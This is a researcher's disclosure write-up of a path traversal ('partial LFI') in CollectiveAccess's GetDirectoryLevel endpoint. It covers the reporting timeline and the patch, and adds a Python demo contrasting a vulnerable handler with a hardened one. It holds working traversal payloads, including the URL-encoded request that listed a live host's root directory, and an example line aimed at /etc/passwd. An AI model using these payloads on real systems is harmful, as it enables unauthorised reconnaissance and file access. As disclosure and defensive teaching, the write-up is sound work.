Partial Local File Inclusion (LFI)

What is a Local File Inclusion?

Local File Inclusion (LFI) is a vulnerability in which a web application includes, or otherwise reads, a file from the server's own file system whose path is controlled by the attacker. It typically arises from improper input validation or insecure use of file inclusion functions (such as include and require in PHP).

In an LFI vulnerability, an attacker manipulates user-supplied input, such as a file path or parameter, to make the application include files located on the server's file system. Depending on what the included file contains and how it is processed, this can lead to unauthorized access to sensitive files, execution of arbitrary code, and even full server compromise.

Here is a simplified example of how LFI can occur. Suppose index.php includes whatever file is named in its page parameter without validating it. An attacker can exploit this by supplying a malicious value that contains a path to a sensitive file on the server (the ../ segments climb out of the directory the application expects to read from):

http://example.com/index.php?page=../../../etc/passwd

A few words about the bug itself

Why is it partial? Because no file contents could be read by exploiting the vulnerability; it only exposed the directory structure of the host (directory names and entry counts). In other words, this is a path traversal against a directory-listing endpoint rather than a full file inclusion.

During research on an application called CollectiveAccess (https://collectiveaccess.org/), I discovered a function called GetDirectoryLevel that takes a user-supplied id parameter. By simply inserting the classic dot-dot-slash payload, a user could escape from the application folder and walk the entire OS-level folder structure.

By executing the following request as an authenticated user: https://SITE.COM/batch/MediaImport/GetDirectoryLevel?id=%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F&init=&start=0&max=100 the response contains all the folders in the root of the OS. The id value is nothing more than /../../../../../ URL-encoded (%2F is a slash, %2e a dot); applied relative to the media import directory, the five ../ segments climb all the way up to the filesystem root, and the response is the listing of that directory:

{"\/|6":{"001":{"item_id":"001","name":"001","fullname":"001","type":"DIR","children":1,"files":0,"subdirectories":1},"bin":{"item_id":"bin","name":"bin","fullname":"bin","type":"DIR","children":1161,"files":1161,"subdirectories":0},"boot":{"item_id":"boot","name":"boot","fullname":"boot","type":"DIR","children":22,"files":18,"subdirectories":4},"carleton":{"item_id":"carleton","name":"carleton","fullname":"carleton","type":"DIR","children":0,"files":0,"subdirectories":0},"data":{"item_id":"data","name":"data","fullname":"data","type":"DIR","children":86,"files":2,"subdirectories":84},"dev":{"item_id":"dev","name":"dev","fullname":"dev","type":"DIR","children":196,"files":176,"subdirectories":20},"dips":{"item_id":"dips","name":"dips","fullname":"dips","type":"DIR","children":4,"files":1,"subdirectories":3},"etc":{"item_id":"etc","name":"etc","fullname":"etc","type":"DIR","children":229,"files":109,"subdirectories":120},"home":{"item_id":"home","name":"home","fullname":"home","type":"DIR","children":12,"files":0,"subdirectories":12},"keybase":{"item_id":"keybase","name":"keybase","fullname":"keybase","type":"DIR","children":0,"files":0,"subdirectories":0},"lib":{"item_id":"lib","name":"lib","fullname":"lib","type":"DIR","children":43,"files":4,"subdirectories":39},"lib64":{"item_id":"lib64","name":"lib64","fullname":"lib64","type":"DIR","children":1433,"files":1360,"subdirectories":73},"magic":{"item_id":"magic","name":"magic","fullname":"magic","type":"FILE"},"media":{"item_id":"media","name":"media","fullname":"media","type":"DIR","children":0,"files":0,"subdirectories":0},"mnt":{"item_id":"mnt","name":"mnt","fullname":"mnt","type":"DIR","children":0,"files":0,"subdirectories":0},"nas":{"item_id":"nas","name":"nas","fullname":"nas","type":"DIR","children":22,"files":5,"subdirectories":17},"opt":{"item_id":"opt","name":"opt","fullname":"opt","type":"DIR","children":3,"files":0,"subdirectories":3},"proc":{"item_id":"proc","name":"proc","fullname":"proc","type":"DIR","children":316,"files":46,"subdirectories":270},"root":{"item_id":"root","name":"root","fullname":"root","type":"DIR","children":0,"files":0,"subdirectories":0},"run":{"item_id":"run","name":"run","fullname":"run","type":"DIR","children":51,"files":16,"subdirectories":35},"sbin":{"item_id":"sbin","name":"sbin","fullname":"sbin","type":"DIR","children":509,"files":509,"subdirectories":0},"srv":{"item_id":"srv","name":"srv","fullname":"srv","type":"DIR","children":0,"files":0,"subdirectories":0},"ssd":{"item_id":"ssd","name":"ssd","fullname":"ssd","type":"DIR","children":1,"files":0,"subdirectories":1},"sys":{"item_id":"sys","name":"sys","fullname":"sys","type":"DIR","children":11,"files":0,"subdirectories":11},"thunderbolt":{"item_id":"thunderbolt","name":"thunderbolt","fullname":"thunderbolt","type":"DIR","children":70,"files":16,"subdirectories":54},"tmp":{"item_id":"tmp","name":"tmp","fullname":"tmp","type":"DIR","children":44,"files":44,"subdirectories":0},"upload":{"item_id":"upload","name":"upload","fullname":"upload","type":"DIR","children":2,"files":0,"subdirectories":2},"usr":{"item_id":"usr","name":"usr","fullname":"usr","type":"DIR","children":12,"files":0,"subdirectories":12},"var":{"item_id":"var","name":"var","fullname":"var","type":"DIR","children":22,"files":0,"subdirectories":22},"web":{"item_id":"web","name":"web","fullname":"web","type":"DIR","children":86,"files":2,"subdirectories":84},"_primaryKey":"name","_itemCount":60}}
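
To make the two traversal cases on this page concrete, the page-include LFI from the introduction (index.php?page=) and the GetDirectoryLevel directory listing just shown, here is an added example in Python. It is not CollectiveAccess code (the project itself is PHP) and not the maintainer's fix; the handler names, the confine_to_base helper and the sample directory tree are all constructed for the demo. It feeds the exact URL-encoded id value from the write-up to a naive listing handler, which walks up to the (fake) root just like the real endpoint did, and then to a hardened one that resolves the path with realpath() and refuses anything whose real location is outside the import directory. The same helper confines the page-include case.

```python
"""Added example, not CollectiveAccess code: a directory-listing endpoint in the
style of GetDirectoryLevel, once vulnerable and once hardened, plus the same
confinement check applied to a page include (the index.php?page= case).
All function names, paths and the sample tree are constructed for this demo."""
import os
import tempfile
from typing import Dict, List
from urllib.parse import unquote

# The exact id value from the write-up: "/../../../../../" URL-encoded once.
ENCODED_PAYLOAD = "%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F"


def list_directory_vulnerable(import_root: str, user_id: str) -> List[str]:
    """Vulnerable: the decoded id is glued onto the import root and handed to
    the filesystem. Nothing stops the '..' segments walking above import_root."""
    target = os.path.join(import_root, unquote(user_id).lstrip("/"))
    return sorted(os.listdir(target))


def confine_to_base(base: str, user_path: str) -> str:
    """Resolve user_path under base and refuse anything that ends up outside.

    realpath() collapses '.', '..' and symlinks on both sides; commonpath()
    (rather than startswith) also stops the sibling trick: /srv/app vs /srv/app2.
    user_path must already be decoded exactly once by the web layer. Do not
    unquote() it again here, or %252e%252e%252f becomes '..' after the check.
    """
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, user_path.lstrip("/")))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PermissionError(f"path escapes base directory: {user_path!r}")
    return candidate


def list_directory_hardened(import_root: str, user_id: str) -> List[str]:
    """Same endpoint, but the listing is confined to import_root."""
    return sorted(os.listdir(confine_to_base(import_root, unquote(user_id))))


def read_page_hardened(pages_root: str, page: str) -> str:
    """The include-style case: only files under pages_root can be read."""
    with open(confine_to_base(pages_root, page), encoding="utf-8") as fh:
        return fh.read()


def build_sandbox() -> str:
    """Constructed directory tree standing in for a host's filesystem.
    The import directory sits five levels below the sandbox root, so the five
    '../' segments in ENCODED_PAYLOAD land exactly on the fake root."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    for d in ("srv/www/app/media/import/batch1", "srv/www/app/pages", "etc", "bin"):
        os.makedirs(os.path.join(root, d))
    with open(os.path.join(root, "etc", "passwd"), "w", encoding="utf-8") as fh:
        fh.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed sample content
    with open(os.path.join(root, "srv/www/app/pages/home.html"), "w", encoding="utf-8") as fh:
        fh.write("<h1>home</h1>\n")
    return root


def run_demo() -> Dict[str, object]:
    """Run the payload against both versions and report what each allowed."""
    root = build_sandbox()
    import_root = os.path.join(root, "srv/www/app/media/import")
    pages_root = os.path.join(root, "srv/www/app/pages")
    out: Dict[str, object] = {}
    # 1. Vulnerable listing: the traversal reaches the (fake) root directory.
    out["vulnerable_listing"] = list_directory_vulnerable(import_root, ENCODED_PAYLOAD)
    # 2. Hardened listing: a legitimate sub-folder still works (batch1 is empty) ...
    out["hardened_benign"] = list_directory_hardened(import_root, "batch1")
    # ... while the traversal payload and the sibling-directory trick are refused.
    checks = [
        ("hardened_traversal", lambda: list_directory_hardened(import_root, ENCODED_PAYLOAD)),
        ("hardened_sibling", lambda: confine_to_base(import_root, "../import2")),
        ("page_traversal", lambda: read_page_hardened(pages_root, "../../../../../etc/passwd")),
    ]
    for name, attempt in checks:
        try:
            attempt()
            out[name] = "allowed"
        except PermissionError:
            out[name] = "blocked"
    # 3. The include-style handler still serves its own files.
    out["page_benign"] = read_page_hardened(pages_root, "home.html")
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Two design points worth noting. The check compares canonical paths rather than rejecting the substring "..", because a block-list misses encoded, doubled or symlinked variants; and it runs on the value the framework hands the handler, decoded once, since decoding a second time inside the check is exactly what double-encoding payloads rely on.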
 
Takeaway:
Always check for opportunities to escape the folder structure of the application itself, and try both the raw and the URL-encoded form of the dot-dot-slash payload. An endpoint that only returns directory metadata (names, child counts) still leaks the host's layout even when no file contents can be read, and that layout is exactly what a follow-up attack needs.

Severity of the issue
Since authentication is required to reach the endpoint (PR:L), I rated the issue Medium (6.5) with the following CVSS 3.x base vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
 

Timeline of the report

  • Issue has been reported on May 25th 2023
  • Issue has been validated on May 26th 2023
  • Issue has been fixed on the same day – May 26th 2023

Thanks for the quick response and even quicker resolution!

For the applied patch, please check out the maintainer’s commit:

https://github.com/collectiveaccess/providence/commit/6afb9850a3a8e6bea2fa6bcd7f8700c843a37507